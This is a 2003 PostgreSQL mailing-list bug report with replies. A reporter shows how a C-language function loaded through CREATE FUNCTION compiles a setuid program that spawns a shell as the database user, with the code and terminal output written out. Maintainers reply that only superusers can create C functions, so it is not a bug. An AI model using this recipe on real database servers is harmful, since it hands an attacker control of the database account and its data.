================================================== ==========================
POSTGRESQL BUG REPORT TEMPLATE
================================================== ==========================


Your name : Diego Linke
Your email address : gamk (AT) gamk (DOT) com.br

System Configuration
---------------------
Architecture (example: Intel Pentium) : Intel

Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE

PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2

Compiler used (example: gcc 2.95.2) : 2.95.3 20010315

Please enter a FULL description of your problem:
------------------------------------------------

The problem is that postgresql when calls a function in external C, calls with user of the postgres.
A bad user will be able to create binary with shell suid for the user of postgres, and to assume the control of postgres (pg_hba.conf, bases, postmaster, at last everything that the user of postgres can make).
I presume that this problem has in all the versions of postgres.


See this example:

(work/ttyp2:/tmp/ja_era)> id
uid=1000(gamk) gid=100(users) groups=100(users),0(wheel),5(operator)
(work/ttyp2:/tmp/ja_era)> id pgsql
uid=1001(pgsql) gid=1000(pgsql) groups=1000(pgsql)
(work/ttyp2:/tmp/ja_era)> cat supg.c
main() {
setuid(1001);
setgid(1000);
system("/bin/sh");
}
(work/ttyp2:/tmp/ja_era)> cat func.c
#include <stdlib.h>

int execute(int x) {
system("gcc -o /tmp/ja_era/supg /tmp/ja_era/supg.c");
system("chmod a+x /tmp/ja_era/supg");
system("chmod u+s /tmp/ja_era/supg");
return(x+1);
}
(work/ttyp2:/tmp/ja_era)> cc -c -fpic func.c
(work/ttyp2:/tmp/ja_era)> cc -o func.so -shared func.o
(work/ttyp2:/tmp/ja_era)> psql teste
Welcome to psql 7.3.2, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit

teste=# CREATE FUNCTION execute (integer) RETURNS integer AS '/tmp/ja_era/func.so' LANGUAGE C;
CREATE FUNCTION
teste=# SELECT execute(5);
execute
---------
6
(1 row)
B

teste=# \q
(work/ttyp2:/tmp/ja_era)> ls -l supg
-rws--x--x 1 pgsql wheel 6029 Aug 14 08:41 supg*
(work/ttyp2:/tmp/ja_era)> ./supg
$ whoami
pgsql
$ id
uid=1000(gamk) euid=1001(pgsql) gid=100(users) groups=100(users),0(wheel),5(operator)
$ touch /tmp/teste
$ ls -l /tmp/teste
-rw-r--r-- 1 pgsql wheel 0 Aug 14 08:42 /tmp/teste
$



--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk (AT) gamk (DOT) com.br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464


---------------------------(end of broadcast)---------------------------
TIP 2: you can get off all lists at once with the unregister command
(send "unregister YourEmailAddressHere" to majordomo (AT) postgresql (DOT) org)

On Thu, 14 Aug 2003, Diego Linke - GAMK wrote:

Only a bad database superuser should be able to do anything of the sort
because normal users shouldn't be allowed to use CREATE FUNCTION with C
language functions (it's untrusted), are you seeing something different?


---------------------------(end of broadcast)---------------------------
TIP 5: Have you checked our extensive FAQ?

http://www.postgresql.org/docs/faqs/FAQ.html

Diego Linke - GAMK <linke (AT) calnet (DOT) com.br> writes:
The ability to create C functions is reserved to superusers, for exactly
this reason. If you have the rights to make the backend execute
arbitrary C code, you hardly need a shell to do something nasty.

In short, this is not a bug. Don't give superuser privileges to people
you cannot trust.

regards, tom lane

---------------------------(end of broadcast)---------------------------
TIP 5: Have you checked our extensive FAQ?

http://www.postgresql.org/docs/faqs/FAQ.html